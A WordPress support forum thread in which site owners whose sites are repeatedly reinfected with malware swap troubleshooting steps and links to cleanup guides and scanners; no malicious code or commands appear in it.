Malware Keeps Coming Back

Read through the official codex for My Site Was Hacked.
https://codex.www.ads-software.com/FAQ_My_site_was_hacked

And I would definitely take the time to update the theme as that might be the culprit.

Hi Citra, unfortunately that page is not very useful, it’s just a rabbit-hole of links and “possible” solutions. There’s no way I have the time to go through all this and implement the steps.

You can attempt to manually locate and remove the malicious code. Even the chances of an expert being able to completely clean your site are poor. Someone can spend days looking through files, removing small snippets of hacker code. If they miss one bit, the entire hack can be replaced by the hacker in a second once the site goes online

There MUST be an easier way…

Please ??

Lol, as if my last post was removed.

There’s no way I have the time to go through all this and implement the steps.

There is no easier way unless you pay someone to do it for you. Even if you find the code, how did it get there? There is an exploit the hacker is taking advantage of.

Your server software is also dated, Outdated Web Server Nginx Found: nginx/1.4.4

https://sitecheck.sucuri.net/results/www.thedigitalventure.com/

Personally what I did is pay a security company to clean my site and now watch it for the bad stuff.

I too am having this code come back over and over. I’ve been down the list that citra mentioned and I know everything is clean. I’ve been down other lists where they talk about changing the wp-content directory name; I am leaving changes like this for last ditch effort.
What I know so far:
* I have 3 sites on a self hosted Macintosh server. All security updates have been applied.
* All wordpress and all themes are up-to-date.
* All 3 sites get infected within an hour of each other.
* Only the header files are targeted.
* No one has logged into any of my sites since it was last cleaned so this is not a bad password issue.
* Although my .htaccess files get modified a lot by Backup Buddy, I don’t see anything strange or malicious in them.
* I have cleaned the resulting code that lewisp91 has shown above only for the code to come back within 3 to 36 hours. Even though I’ve cleaned the resulting code, I am now looking for the injection code of the malware.

lewisp91, What kind of hosting server/service are you using?

Coming strategy for fixing this:
* Turn off one of my sites to see if it gets infected when the other do. If so, then it’s some process running on the server.
* Compare web server logs commands to the times when the header files get modified. This is a pain in the ass but it might find the code/IP source of the malware.

I’m sure we are not the first people to get this. I wish someone with more knowledge of this malware would step up and tell us how to remove/fix the exploit in my server.

Rob

You need to start working your way through these resources:

• https://codex.www.ads-software.com/FAQ_My_site_was_hacked
• https://www.ads-software.com/support/topic/268083#post-1065779
• https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
• https://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:

• https://sitecheck.sucuri.net/scanner/
• https://www.unmaskparasites.com/
• https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html